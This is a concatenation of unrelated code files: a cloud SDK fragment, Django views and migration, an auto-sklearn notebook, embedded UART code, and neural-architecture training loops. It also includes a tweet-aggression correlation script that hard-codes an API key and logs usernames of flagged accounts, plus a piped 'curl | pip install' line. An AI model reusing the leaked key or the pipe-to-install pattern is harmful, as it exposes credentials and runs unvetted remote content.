range(len(HpHosts[i].get('HpHostDisks'))): if HpHosts[i].get('HpHostDisks')[j] is not None: self.add_query_param('HpHost.' + str(i + 1) + '.HpHostDisk.'+str(j + 1), HpHosts[i].get('HpHostDisks')[j]) if HpHosts[i].get('VswitchId') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.VswitchId' , HpHosts[i].get('VswitchId')) if HpHosts[i].get('ExternalKey') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.ExternalKey' , HpHosts[i].get('ExternalKey')) if HpHosts[i].get('HostName') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.HostName' , HpHosts[i].get('HostName')) if HpHosts[i].get('VpcId') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.VpcId' , HpHosts[i].get('VpcId')) if HpHosts[i].get('InnerIp') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.InnerIp' , HpHosts[i].get('InnerIp')) if HpHosts[i].get('ExternalIp') is not None: self.add_query_param('HpHost.' + str(i + 1) + '.ExternalIp' , HpHosts[i].get('ExternalIp')) def get_HpBizId(self): return self.get_query_params().get('HpBizId') def set_HpBizId(self,HpBizId): self.add_query_param('HpBizId',HpBizId)from masonite.tests import TestCase from src.form_builder.Field import Field class TestBaseField(TestCase): def test_field_creation(self): field = Field.make("my_field") assert field._handle == "my_field" def test_placeholder(self): field = Field.make("my_field").placeholder("Enter a value") assert field.config.placeholder == "Enter a value" field = field.placeholder() assert field.config.placeholder == "" def test_label(self): field = Field.make("my_field").label("") assert field.config.label == "" field = field.label() assert field.config.label == "" import csv import re from datetime import * from time import * from threading import Timer import cpd_data from tweepy import OAuthHandler import tweepy import sys sys.path.append('code/tools') sys.path.append('code/classification') from features import get_feats from tools import write_out_data from cascade import cascade ckey = '6pobfVELAEwSIuDRJ6faOVnmN' consumer_secret = '' access_token_key = '' access_token_secret = '' def correlate(last_seen_id=None, num_days=5): #set up with today's date today = date.today() print today #TESTING x_days_ago = today-timedelta(days=num_days) #pull data from cpd from past month cpd_incidents = cpd_data.get_cpd_data(today) #TESTING for c in cpd_incidents: print c print #go through tweets from past week reader = csv.DictReader(open('/proj/nlp/users/terra/streaming_results/twitter_stream_result.csv', 'rb')) if last_seen_id: too_far_back=True else: too_far_back=False recent_tweets = [] usernames = [] most_recent_id = None for row in reader: if too_far_back: if row['ID'] == last_seen_id: too_far_back=False continue ts = strptime(row['DATE'], '%a %b %d %H:%M:%S +0000 %Y') dt = date.fromtimestamp(mktime(ts)) if dt > x_days_ago: break #else: most_recent_id = row['ID'] recent_tweets.append((row['ID'], row['CONTENT'], dt)) #get the usernames from tweet usernames.extend(get_usernames(row['CONTENT'])) #if labeled aggressive, put into aggressive list #aggressive_tweets = [(id, date)] aggressive_tweets = get_aggressive_tweets(recent_tweets) #TODO correlate events within 5 days after each aggress tweet with resp. tweet and output correlations to file with date correlated_data = {} for tweet in aggressive_tweets: tweet_id = tweet[0] tweet_date = tweet[1] end_date = tweet_date+timedelta(days=num_days) related_incidents = [] for c in cpd_incidents: ts = strptime(c['date'], '%Y-%m-%dT%H:%M:%S.000') event_date = date.fromtimestamp(mktime(ts)) if event_date >= tweet_date and event_date < end_date: related_incidents.append(c) correlated_data[tweet_id] = related_incidents #appends this week's data to file write_out_correlations(correlated_data) #writes username and userid to file if user description has gang hashtags write_out_usernames(usernames) print 'correlated!' return most_recent_id def get_usernames(tweet): twitter_username_re = re.compile(r'@([A-Za-z0-9_]+)') results = [] for m in twitter_username_re.finditer(tweet): results.append(m) return results #for now just writing out to (an additional) file. TODO automatically verify def write_out_usernames(names): #auth is a global variable api = tweepy.API(auth) e = open('/proj/nlp/users/terra/data/usernames.txt', 'r') f = open('/proj/nlp/users/terra/streaming_results/gathered_usernames.txt', 'a') current_ids = [] for line in e.readlines(): current_ids.append(line.strip().split()[1]) for name in names: try: u = api.get_user(name) if u.id_str not in current_ids: f.write(name+' '+str(u.id_str)+'\n') current_ids.append(u.id_str) except: continue f.close() e.close() return def write_out_correlations(data): f = open('/proj/nlp/users/terra/streaming_results/correlation.txt', 'a') for key in data.keys(): events = data[key] f.write(key+'\n') for e in events: f.write(e+'\n') if len(events) == 0: f.write('no relevant events\n') f.write('\n') f.close() return def get_aggressive_tweets(tweets): content = [t[1] for t in tweets] id_date = [(t[0], t[2]) for t in tweets] results = [] write_out_data(tweets, '/proj/nlp/users/terra/streaming_results/correlate_tmp.csv') predictions = cascade('/proj/nlp/users/terra/streaming_results/correlate_tmp.csv') for p in range(0, len(predictions)): if predictions[p] == 1: results.append(id_date[p]) return results #API connection auth = OAuthHandler(ckey, consumer_secret) auth.set_access_token(access_token_key, access_token_secret) tweet_id = None while 1: tweet_id = correlate(tweet_id, 5) print tweet_id #TODO - set timer for next week delta_t=timedelta(minutes=1) secs=delta_t.total_seconds() print secs sleep(secs) lab1/lab1/views/photo.py from django.core import serializers from django.db.models import F from django.http import HttpResponse, HttpResponseRedirect, QueryDict from django.shortcuts import render from lab1.forms.photo import PhotoForm from lab1.models.photo import Photo from lab1.models.user import User import json def photo_details(request, user_id, photo_id): if not request.user.is_authenticated: return HttpResponse(status=403) try: photo = Photo.objects.get(id=photo_id, user_id=user_id) except Photo.DoesNotExist: return HttpResponse(status=404) if request.method == "GET": return render(request, 'photos/photo_details.html', {'photo': photo}) elif request.method == "PUT": t = QueryDict('', mutable=True) t.update(json.loads(request.body.decode("utf-8"))) form = PhotoForm(t) if form.is_valid(): updated_photo = form.save(commit=False) if updated_photo.title is not None: photo.title = updated_photo.title if updated_photo.image is not None: photo.image = updated_photo.image photo.save() return HttpResponse(status=200) else: return HttpResponse(form, status=400) elif request.method == "DELETE": photo.delete() return HttpResponse(status=200) else: return HttpResponse(status=405) def photos_collection(request, user_id): if not request.user.is_authenticated: return HttpResponse(status=403) if request.method == "POST": t = QueryDict('', mutable=True) t.update(json.loads(request.body.decode("utf-8"))) form = PhotoForm(t) if form.is_valid(): photo = form.save(commit=False) photo.user = User.objects.get(id=user_id) photo.save() response = HttpResponse() response['location']=photo.get_url response.status_code = 201 return response else: return HttpResponse(form, status=400) elif request.method == "GET": photos = Photo.objects.filter(user_id=user_id) return render(request, 'photos/photo_listing.html', {'photos': photos, 'user_id': user_id}) else: return HttpResponse(status=405) 0 #!/usr/bin/env python # coding: utf-8 # #
#

Python for Data Science, Homework, template:

#

Breast Cancer Selection

#

#

Propulsion Academy, 2021

#

# #
#
#

Goal: Binary classification on Breast Cancer data

# Sections: # #
    #
  1. Set Up
  2. #
  3. Modeling
  4. #
  5. Evaluation
  6. #
# Topics Trained: Binary Classification. #
#
# # # # # ## [Set up](#P0) # In[ ]: # !sudo apt-get install build-essential swig # !curl https://raw.githubusercontent.com/automl/auto-sklearn/master/requirements.txt | xargs -n 1 -L 1 pip install # !pip install auto-sklearn # !pip install pipelineprofiler # visualize the pipelines created by auto-sklearn # !pip install shap # !pip install --upgrade plotly # !pip3 install -U scikit-learn # ### Package imports # In[ ]: import numpy as np import pandas as pd from sklearn.model_selection import train_test_split, cross_val_score from sklearn.preprocessing import StandardScaler from sklearn.linear_model import LinearRegression from sklearn import metrics from sklearn import set_config from sklearn.pipeline import Pipeline from pandas_profiling import ProfileReport from sklearn.impute import SimpleImputer from sklearn.metrics import mean_squared_error, accuracy_score, f1_score from sklearn.base import BaseEstimator, TransformerMixin import autosklearn.classification import PipelineProfiler import plotly.express as px import plotly.graph_objects as go from joblib import dump import shap import datetime import logging import matplotlib.pyplot as plt # In[ ]: from sklearn.model_selection import train_test_split, cross_val_score from sklearn.base import BaseEstimator, TransformerMixin from sklearn.preprocessing import StandardScaler, OrdinalEncoder, OneHotEncoder from sklearn import preprocessing from sklearn.metrics import silhouette_score from sklearn import set_config from sklearn.pipeline import Pipeline from sklearn.compose import ColumnTransformer from sklearn.linear_model import LogisticRegression from sklearn.impute import SimpleImputer # Connect to Google Drive # In[ ]: from google.colab import drive drive.mount('/content/drive', force_remount=True) # In[1]: data_path="/content/drive/MyDrive/Introduction2DataScience/W2D2_Assignment/w2d2/data/raw/" model_path = "/content/drive/MyDrive/Introduction2DataScience/W2D2_Assignment/w2d2/models/" timesstr = str(datetime.datetime.now()).replace(' ', '_') logging.basicConfig(filename=f"{model_path}explog_{timesstr}.log", level=logging.INFO) # In[ ]: pd.set_option('display.max_rows', 25) # In[ ]: set_config(display='diagram') # Please Download the data from [this source](https://drive.google.com/file/d/1uMM8qdQSiHHjIiYPd45EPzXH7sqIiQ9t/view?usp=sharing), and upload it on your introduction2DS/data google drive folder. # # ## [Loading Data and Train-Test Split](#P0) # # **Load the csv file as a DataFrame using Pandas** # In[ ]: # your code here df = pd.read_csv(f'{data_path}data-breast-cancer.csv') df['diagnosis']=df['diagnosis'].map({'M':1, 'B':0}) # In[ ]: df = df.drop(["Unnamed: 32", "id"], axis=1) # In[ ]: test_size = 0.2 random_state = 42 # In[ ]: Y = df['diagnosis'] X = df.drop('diagnosis', axis=1) x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=test_size, random_state=random_state, stratify=Y) # In[ ]: logging.info(f'train test split with test_size={test_size} and random state={random_state}') # In[ ]: total_time = 100 per_run_time_limit = 30 # In[ ]: automl = autosklearn.classification.AutoSklearnClassifier( time_left_for_this_task=total_time, per_run_time_limit=per_run_time_limit, ) automl.fit(x_train, y_train) # In[ ]: # profiler_data= PipelineProfiler.import_autosklearn(automl) # PipelineProfiler.plot_pipeline_matrix(profiler_data) # _Your Comments here_ # In[ ]: logging.info(f'Ran autosklearn regressor for a total time of {total_time} seconds, with a maximum of {per_run_time_limit} seconds per model run') # In[ ]: dump(automl, f'{model_path}model{timesstr}.pkl') # In[ ]: logging.info(f'Saved regressor model at {model_path}model{timesstr}.pkl ') # In[ ]: logging.info(f'autosklearn model statistics:') logging.info(automl.sprint_statistics()) # # ## [Model Evaluation and Explainability](#P0) # In[ ]: y_pred = automl.predict(x_test) # In[ ]: logging.info(f"Accuracy is {accuracy_score(y_test, y_pred)}, \n F1 score is {f1_score(y_test, y_pred)}") # #### Model Explainability # In[ ]: explainer = shap.KernelExplainer(model = automl.predict, data = x_test.iloc[:50, :], link = "identity") # In[ ]: # Set the index of the specific example to explain x_idx = 0 shap_value_single = explainer.shap_values(X = x_test.iloc[x_idx:x_idx+1,:], nsamples = 100) x_test.iloc[x_idx:x_idx+1,:] # print the JS visualization code to the notebook shap.initjs() shap.force_plot(base_value = explainer.expected_value, shap_values = shap_value_single, features = x_test.iloc[x_idx:x_idx+1,:], show=False, matplotlib=True ) plt.savefig(f"{model_path}shap_example_{timesstr}.png") logging.info(f"Shapley example saved as {model_path}shap_example_{timesstr}.png") # In[ ]: shap_values = explainer.shap_values(X = x_test.iloc[0:50,:], nsamples = 100) # In[ ]: # print the JS visualization code to the notebook shap.initjs() fig = shap.summary_plot(shap_values = shap_values, features = x_test.iloc[0:50,:], show=False) plt.savefig(f"{model_path}shap_summary_{timesstr}.png") logging.info(f"Shapley summary saved as {model_path}shap_summary_{timesstr}.png") # In[ ]: # -------------- # # End of This Notebook port_fwd/[01] - xbee_to_gnss.py from sty import Pin from sty import UART import sty import _thread # --------------------------------------------------------------- # On-Board LEDs # --------------------------------------------------------------- led1 = sty.LED(1) led2 = sty.LED(2) led3 = sty.LED(3) # ZED1 message received callback # It is called from ISR!!! # Don't waste the CPU processing time. def OnDataRecvFromZED1(uart, msg): pass # ZED2 message received callback # It is called from ISR!!! # Don't waste the CPU processing time. def OnDataRecvFromZED2(uart, msg): pass # ZED3 message received callback # It is called from ISR!!! # Don't waste the CPU processing time. def OnDataRecvFromZED3(uart, msg): pass # XBEE_LP message received callback # It is called from ISR!!! # Don't waste the CPU processing time. def OnDataRecvFromXBeeLP(uart, msg): zed1_uart.send(msg) zed2_uart.send(msg) zed3_uart.send(msg) led1.toggle() # --------------------------------------------------------------- # GNSS Modules # --------------------------------------------------------------- # Power-on the GNSS subsystem gnss_pwr = Pin('PWR_GNSS', Pin.OUT_PP) gnss_pwr.high() # UART configuration of ZEDs zed1_uart = UART('ZED1', 115200, rxbuf=0) zed2_uart = UART('ZED2', 115200, rxbuf=0) zed3_uart = UART('ZED3', 115200, rxbuf=0) # --------------------------------------------------------------- # XBEE Expansions # --------------------------------------------------------------- # Power-on the XBEE LP subsystem xlp_pwr = Pin('PWR_XBEE_LP', Pin.OUT_PP) xlp_pwr.high() # Re-direct the XBEE LP subsystem to the MCU xlp_dir = Pin('XBEE_LP_DIR', Pin.OUT_PP) xlp_dir.high() # XBEE LP UART configuration xlp_uart = UART('XBEE_LP', 115200, rxbuf=0) # Main application process def app_proc(): # Set the GNSS ISR callbacks zed1_uart.callback(OnDataRecvFromZED1) zed2_uart.callback(OnDataRecvFromZED2) zed3_uart.callback(OnDataRecvFromZED3) # Set the XBEE_LP ISR callback xlp_uart.callback(OnDataRecvFromXBeeLP) while True: pass if __name__ == "__main__": # Start the application process _thread.start_new_thread(app_proc, ()) # Generated by Django 4.0.2 on 2022-02-25 10:57 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('PostAPP', '0001_initial'), ] operations = [ migrations.CreateModel( name='ModelNotification', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('content', models.CharField(max_length=250, verbose_name='Bildirim İçeriği')), ('isRead', models.BooleanField(default=False, verbose_name='Okundu mu')), ('createdDate', models.DateTimeField(auto_now_add=True)), ('kind', models.CharField(choices=[('1', 'Takip'), ('2', 'Yorum'), ('3', 'Beğeni')], max_length=7)), ('post', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='PostAPP.modelpost', verbose_name='Post')), ('receiverUser', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='notifs', to=settings.AUTH_USER_MODEL, verbose_name='Alan Kullanıcı')), ('senderUser', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Gönderen Kullanıcı')), ], ), ] npbench/benchmarks/weather_stencils/vadv/vadv.py10-100 # Copyright 2021 ETH Zurich and the NPBench authors. All rights reserved. import numpy as np def initialize(I, J, K): from numpy.random import default_rng rng = default_rng(42) dtr_stage = 3. / 20. # Define arrays utens_stage = rng.random((I, J, K)) u_stage = rng.random((I, J, K)) wcon = rng.random((I + 1, J, K)) u_pos = rng.random((I, J, K)) utens = rng.random((I, J, K)) return dtr_stage, utens_stage, u_stage, wcon, u_pos, utens from rest_framework_simplejwt import authentication class JWTAuthenticationMiddleware: def __init__(self, get_response): self.get_response = get_response def __call__(self, request): """ If request is using a JWT token, sets the 'user' attribute of the request to the autenticated user. """ try: auth = authentication.JWTAuthentication().authenticate(request) if auth: request.user = auth[0] except: pass return self.get_response(request) # Once for All: Train One Network and Specialize it for Efficient Deployment # , , , , # International Conference on Learning Representations (ICLR), 2020. import json import torch.nn as nn from tqdm import tqdm import random import os import time import numpy as np from itertools import chain, combinations, permutations import torch import torch.nn.functional as F # import horovod.torch as hvd import distributed from imagenet_codebase.run_manager import DistributedMetric from imagenet_codebase.utils import accuracy, list_mean, cross_entropy_loss_with_soft_target, subset_mean, \ AverageMeter, int2list, download_url, mix_images, mix_labels from imagenet_codebase.data_providers.base_provider import MyRandomResizedCrop from imagenet_codebase.run_manager.distributed_run_manager import DistributedRunManager def validate(run_manager, epoch=0, is_test=True, image_size_list=None, width_mult_list=None, ks_list=None, expand_ratio_list=None, depth_list=None, additional_setting=None): dynamic_net = run_manager.net if isinstance(dynamic_net, nn.DataParallel): dynamic_net = dynamic_net.module dynamic_net.eval() if image_size_list is None: image_size_list = int2list(run_manager.run_config.data_provider.image_size, 1) if width_mult_list is None: width_mult_list = [i for i in range(len(dynamic_net.width_mult_list))] if ks_list is None: ks_list = dynamic_net.ks_list if expand_ratio_list is None: expand_ratio_list = dynamic_net.expand_ratio_list if depth_list is None: depth_list = dynamic_net.depth_list subnet_settings = [] for w in width_mult_list: for d in depth_list: for e in expand_ratio_list: for k in ks_list: for img_size in image_size_list: subnet_settings.append([{ 'image_size': img_size, 'wid': w, 'd': d, 'e': e, 'ks': k, }, 'R%s-W%s-D%s-E%s-K%s' % (img_size, w, d, e, k)]) if additional_setting is not None: subnet_settings += additional_setting losses_of_subnets, top1_of_subnets, top5_of_subnets = [], [], [] valid_log = '' for setting, name in subnet_settings: print(setting) run_manager.write_log('-' * 30 + ' Validate %s ' % name + '-' * 30, 'train', should_print=True) run_manager.run_config.data_provider.assign_active_img_size(setting.pop('image_size')) # setting.pop('image_size') dynamic_net.set_active_subnet(**setting) run_manager.write_log(dynamic_net.module_str, 'train', should_print=True) run_manager.reset_running_statistics(dynamic_net) loss, top1, top5 = run_manager.validate(epoch=epoch, is_test=is_test, run_str=name, net=dynamic_net) losses_of_subnets.append(loss) top1_of_subnets.append(top1) top5_of_subnets.append(top5) valid_log += '%s (%.3f), ' % (name, top1) return list_mean(losses_of_subnets), list_mean(top1_of_subnets), list_mean(top5_of_subnets), valid_log # different submodels are sampled during each step, many submodels are trained in one epoch # total num of epochs = warmup_epochs + num_epoch # dynamic_batchsize sets the number of different models trained in each step(using the same data), loss is then backpropped together def train_one_epoch(run_manager, args, epoch, warmup_epochs=0, warmup_lr=0): dynamic_net = run_manager.net # switch to train mode dynamic_net.train() run_manager.run_config.train_loader.sampler.set_epoch(epoch) MyRandomResizedCrop.EPOCH = epoch nBatch = len(run_manager.run_config.train_loader) data_time = AverageMeter() losses = DistributedMetric('train_loss') top1 = DistributedMetric('train_top1') top5 = DistributedMetric('train_top5') # with tqdm(total=nBatch, # desc='Train Epoch #{}'.format(epoch + 1), # disable=not run_manager.is_root) as t: end = time.time() for i, (images, labels) in enumerate(run_manager.run_config.train_loader): data_time.update(time.time() - end) if epoch < warmup_epochs: new_lr = run_manager.run_config.warmup_adjust_learning_rate( run_manager.optimizer, warmup_epochs * nBatch, nBatch, epoch, i, warmup_lr, ) else: new_lr = run_manager.run_config.adjust_learning_rate( run_manager.optimizer, epoch - warmup_epochs, i, nBatch ) images, labels = images.cuda(), labels.cuda() target = labels # soft target if args.kd_ratio > 0: args.teacher_model.train() with torch.no_grad(): soft_logits = args.teacher_model(images).detach() soft_label = F.softmax(soft_logits, dim=1) # clear gradients run_manager.optimizer.zero_grad() loss_of_subnets, acc1_of_subnets, acc5_of_subnets = [], [], [] # compute output subnet_str = '' for _ in range(args.dynamic_batch_size): # set random seed before sampling if args.independent_distributed_sampling: subnet_seed = os.getpid() + time.time() else: subnet_seed = int('%d%.3d%.3d' % (epoch * nBatch + i, _, 0)) random.seed(subnet_seed) subnet_settings = dynamic_net.sample_active_subnet() subnet_str += '%d: ' % _ + ','.join(['%s_%s' % ( key, '%.1f' % subset_mean(val, 0) if isinstance(val, list) else val ) for key, val in subnet_settings.items()]) + ' || ' output = run_manager.net(images) if args.kd_ratio == 0: loss = run_manager.train_criterion(output, labels) loss_type = 'ce' else: if args.kd_type == 'ce': kd_loss = cross_entropy_loss_with_soft_target(output, soft_label) else: kd_loss = F.mse_loss(output, soft_logits) loss = args.kd_ratio * kd_loss + run_manager.train_criterion(output, labels) loss = loss * (2 / (args.kd_ratio + 1)) loss_type = '%.1fkd-%s & ce' % (args.kd_ratio, args.kd_type) # measure accuracy and record loss acc1, acc5 = accuracy(output, target, topk=(1, 5)) loss_of_subnets.append(loss) acc1_of_subnets.append(acc1[0]) acc5_of_subnets.append(acc5[0]) loss = loss / distributed.get_world_size() loss.backward() distributed.sync_grad_sum(run_manager.net) run_manager.optimizer.step() losses.update(list_mean(loss_of_subnets), images.size(0)) top1.update(list_mean(acc1_of_subnets), images.size(0)) top5.update(list_mean(acc5_of_subnets), images.size(0)) if i % 100 == 0 and torch.distributed.get_rank() == 0: string = f"Epoch [{epoch}] Iter [{i}/{nBatch}] " for key, value in { 'task': args.task, 'phase': args.phase, 'loss': losses.avg.item(), 'top1': top1.avg.item(), 'top5': top5.avg.item(), 'R': images.size(2), 'lr': new_lr, 'loss_type': loss_type, 'seed': str(subnet_seed), 'str': subnet_str, 'data_time': data_time.avg, }.items(): string += f"{key}: {value}, " print(string) # t.set_postfix({ # 'task':args.task, # 'phase':args.phase, # 'loss': losses.avg.item(), # 'top1': top1.avg.item(), # 'top5': top5.avg.item(), # 'R': images.size(2), # 'lr': new_lr, # 'loss_type': loss_type, # 'seed': str(subnet_seed), # 'str': subnet_str, # 'data_time': data_time.avg, # }) # t.update(1) end = time.time() # with tqdm(total=nBatch, # desc='Train Epoch #{}'.format(epoch + 1), # disable=not run_manager.is_root) as t: # end = time.time() # for i, (images, labels) in enumerate(run_manager.run_config.train_loader): # data_time.update(time.time() - end) # if epoch < warmup_epochs: # new_lr = run_manager.run_config.warmup_adjust_learning_rate( # run_manager.optimizer, warmup_epochs * nBatch, nBatch, epoch, i, warmup_lr, # ) # else: # new_lr = run_manager.run_config.adjust_learning_rate( # run_manager.optimizer, epoch - warmup_epochs, i, nBatch # ) # # images, labels = images.cuda(), labels.cuda() # target = labels # # # soft target # if args.kd_ratio > 0: # args.teacher_model.train() # with torch.no_grad(): # soft_logits = args.teacher_model(images).detach() # soft_label = F.softmax(soft_logits, dim=1) # # # clear gradients # run_manager.optimizer.zero_grad() # # loss_of_subnets, acc1_of_subnets, acc5_of_subnets = [], [], [] # # compute output # subnet_str = '' # for _ in range(args.dynamic_batch_size): # # # set random seed before sampling # if args.independent_distributed_sampling: # subnet_seed = os.getpid() + time.time() # else: # subnet_seed = int('%d%.3d%.3d' % (epoch * nBatch + i, _, 0)) # random.seed(subnet_seed) # subnet_settings = dynamic_net.sample_active_subnet() # subnet_str += '%d: ' % _ + ','.join(['%s_%s' % ( # key, '%.1f' % subset_mean(val, 0) if isinstance(val, list) else val # ) for key, val in subnet_settings.items()]) + ' || ' # # output = run_manager.net(images) # if args.kd_ratio == 0: # loss = run_manager.train_criterion(output, labels) # loss_type = 'ce' # else: # if args.kd_type == 'ce': # kd_loss = cross_entropy_loss_with_soft_target(output, soft_label) # else: # kd_loss = F.mse_loss(output, soft_logits) # loss = args.kd_ratio * kd_loss + run_manager.train_criterion(output, labels) # loss = loss * (2 / (args.kd_ratio + 1)) # loss_type = '%.1fkd-%s & ce' % (args.kd_ratio, args.kd_type) # # # measure accuracy and record loss # acc1, acc5 = accuracy(output, target, topk=(1, 5)) # loss_of_subnets.append(loss) # acc1_of_subnets.append(acc1[0]) # acc5_of_subnets.append(acc5[0]) # loss = loss / distributed.get_world_size() # loss.backward() # distributed.sync_grad_sum(run_manager.net) # run_manager.optimizer.step() # losses.update(list_mean(loss_of_subnets), images.size(0)) # top1.update(list_mean(acc1_of_subnets), images.size(0)) # top5.update(list_mean(acc5_of_subnets), images.size(0)) # # t.set_postfix({ # 'task':args.task, # 'phase':args.phase, # 'loss': losses.avg.item(), # 'top1': top1.avg.item(), # 'top5': top5.avg.item(), # 'R': images.size(2), # 'lr': new_lr, # 'loss_type': loss_type, # 'seed': str(subnet_seed), # 'str': subnet_str, # 'data_time': data_time.avg, # }) # t.update(1) # end = time.time() return losses.avg.item(), top1.avg.item(), top5.avg.item() def train(run_manager, args, validate_func=None): if validate_func is None: validate_func = validate for epoch in range(run_manager.start_epoch, run_manager.run_config.n_epochs + args.warmup_epochs): train_loss, train_top1, train_top5 = train_one_epoch( run_manager, args, epoch, args.warmup_epochs, args.warmup_lr) if (epoch + 1) % args.validation_frequency == 0: # validate under train mode val_loss, val_acc, val_acc5, _val_log = validate_func(run_manager, epoch=epoch, is_test=True) # best_acc is_best = val_acc > run_manager.best_acc run_manager.best_acc = max(run_manager.best_acc, val_acc) if run_manager.is_root: val_log = 'Valid [{0}/{1}] loss={2:.3f}, top-1={3:.3f} ({4:.3f})'. \ format(epoch + 1 - args.warmup_epochs, run_manager.run_config.n_epochs, val_loss, val_acc, run_manager.best_acc) val_log += ', Train top-1 {top1:.3f}, Train loss {loss:.3f}\t'.format(top1=train_top1, loss=train_loss) val_log += _val_log run_manager.write_log(val_log, 'valid', should_print=False) run_manager.save_model({ 'epoch': epoch, 'best_acc': run_manager.best_acc, 'optimizer': run_manager.optimizer.state_dict(), 'state_dict': run_manager.net.state_dict(), }, is_best=is_best) def load_models(run_manager, dynamic_net, model_path=None): # specify init path init = torch.load(model_path, map_location='cpu')['state_dict'] dynamic_net.load_weights_from_net(init) run_manager.write_log('Loaded init from %s' % model_path, 'valid') def supporting_elastic_depth(train_func, run_manager, args, validate_func_dict): dynamic_net = run_manager.net if isinstance(dynamic_net, nn.DataParallel): dynamic_net = dynamic_net.module # load stage info stage_info_path = os.path.join(run_manager.path, 'depth.stage') try: stage_info = json.load(open(stage_info_path)) except Exception: stage_info = {'stage': 0} # load pretrained models validate_func_dict['depth_list'] = sorted(dynamic_net.depth_list) if args.phase == 1: load_models(run_manager, dynamic_net, model_path='exp/normal2kernel/checkpoint/model_best.pth.tar') else: load_models(run_manager, dynamic_net, model_path='exp/kernel2kernel_depth/phase1/checkpoint/model_best.pth.tar') # validate after loading weights run_manager.write_log('%.3f\t%.3f\t%.3f\t%s' % validate(run_manager, **validate_func_dict), 'valid') depth_stage_list = dynamic_net.depth_list.copy() depth_stage_list.sort(reverse=True) n_stages = len(depth_stage_list) - 1 start_stage = n_stages - 1 for current_stage in range(start_stage, n_stages): run_manager.write_log( '-' * 30 + 'Supporting Elastic Depth: %s -> %s' % (depth_stage_list[:current_stage + 1], depth_stage_list[:current_stage + 2]) + '-' * 30, 'valid' ) # add depth list constraints supported_depth = depth_stage_list[:current_stage + 2] if len(set(dynamic_net.ks_list)) == 1 and len(set(dynamic_net.expand_ratio_list)) == 1: validate_func_dict['depth_list'] = supported_depth else: validate_func_dict['depth_list'] = sorted({min(supported_depth), max(supported_depth)}) dynamic_net.set_constraint(supported_depth, constraint_type='depth') # train train_func( run_manager, args, lambda _run_manager, epoch, is_test: validate(_run_manager, epoch, is_test, **validate_func_dict) ) # next stage & reset stage_info['stage'] += 1 run_manager.start_epoch = 0 run_manager.best_acc = 0.0 # save and validate run_manager.save_model(model_name='depth_stage%d.pth.tar' % stage_info['stage']) json.dump(stage_info, open(stage_info_path, 'w'), indent=4) validate_func_dict['depth_list'] = sorted(dynamic_net.depth_list) run_manager.write_log('%.3f\t%.3f\t%.3f\t%s' % validate(run_manager, **validate_func_dict), 'valid') def supporting_elastic_expand(train_func, run_manager, args, validate_func_dict): dynamic_net = run_manager.net if isinstance(dynamic_net, nn.DataParallel): dynamic_net = dynamic_net.module # load stage info stage_info_path = os.path.join(run_manager.path, 'expand.stage') try: stage_info = json.load(open(stage_info_path)) except Exception: stage_info = {'stage': 0} # load pretrained models validate_func_dict['expand_ratio_list'] = sorted(dynamic_net.expand_ratio_list) if args.phase == 1: load_models(run_manager, dynamic_net, model_path='exp/kernel2kernel_depth/phase2/checkpoint/model_best.pth.tar') else: load_models(run_manager, dynamic_net, model_path='exp/kernel_depth2kernel_depth_width/phase1/checkpoint/model_best.pth.tar') dynamic_net.re_organize_middle_weights() run_manager.write_log('%.3f\t%.3f\t%.3f\t%s' % validate(run_manager, **validate_func_dict), 'valid') expand_stage_list = dynamic_net.expand_ratio_list.copy() expand_stage_list.sort(reverse=True) n_stages = len(expand_stage_list) - 1 start_stage = n_stages - 1 for current_stage in range(start_stage, n_stages): run_manager.write_log( '-' * 30 + 'Supporting Elastic Expand Ratio: %s -> %s' % (expand_stage_list[:current_stage + 1], expand_stage_list[:current_stage + 2]) + '-' * 30, 'valid' ) # add expand list constraints supported_expand = expand_stage_list[:current_stage + 2] if len(set(dynamic_net.ks_list)) == 1 and len(set(dynamic_net.depth_list)) == 1: validate_func_dict['expand_ratio_list'] = supported_expand else: validate_func_dict['expand_ratio_list'] = sorted({min(supported_expand), max(supported_expand)}) dynamic_net.set_constraint(supported_expand, constraint_type='expand_ratio') # train train_func( run_manager, args, lambda _run_manager, epoch, is_test: validate(_run_manager, epoch, is_test, **validate_func_dict) ) # next stage & reset stage_info['stage'] += 1 run_manager.start_epoch = 0 run_manager.best_acc = 0.0 dynamic_net.re_organize_middle_weights(expand_ratio_stage=stage_info['stage']) if isinstance(run_manager, DistributedRunManager): run_manager.broadcast() # save and validate run_manager.save_model(model_name='expand_stage%d.pth.tar' % stage_info['stage']) json.dump(stage_info, open(stage_info_path, 'w'), indent=4) validate_func_dict['expand_ratio_list'] = sorted(dynamic_net.expand_ratio_list) run_manager.write_log('%.3f\t%.3f\t%.3f\t%s' % validate(run_manager, **validate_func_dict), 'valid') def train_supernet(run_manager, args, validate_func=None, cur_model_id=-1): if validate_func is None: validate_func = validate for epoch in range(run_manager.start_epoch, run_manager.end_epoch + args.warmup_epochs): train_loss, train_top1, train_top5 = train_supernet_one_epoch( run_manager, args, epoch, args.warmup_epochs, args.warmup_lr) if (epoch + 1) % args.validation_frequency == 0: # validate under train mode val_loss, val_acc, val_acc5, _val_log = validate_func(run_manager, epoch=epoch, is_test=True) # best_acc is_best = val_acc > run_manager.best_acc run_manager.best_acc = max(run_manager.best_acc, val_acc) if run_manager.is_root: val_log = 'Valid [{0}/{1}] loss={2:.3f}, top-1={3:.3f} ({4:.3f})'. \ format(epoch + 1 - args.warmup_epochs, run_manager.run_config.n_epochs, val_loss, val_acc, run_manager.best_acc) val_log += ', Train top-1 {top1:.3f}, Train loss {loss:.3f}\t'.format(top1=train_top1, loss=train_loss) val_log += _val_log run_manager.write_log(val_log, 'valid', should_print=False) if cur_model_id >= 0: run_manager.save_model({ 'epoch': epoch, 'best_acc': run_manager.best_acc, 'optimizer': run_manager.optimizer.state_dict(), 'state_dict': run_manager.net.state_dict(), }, is_best=is_best, model_name='submodel_' + str(cur_model_id) + '_checkpoint.pth.tar', 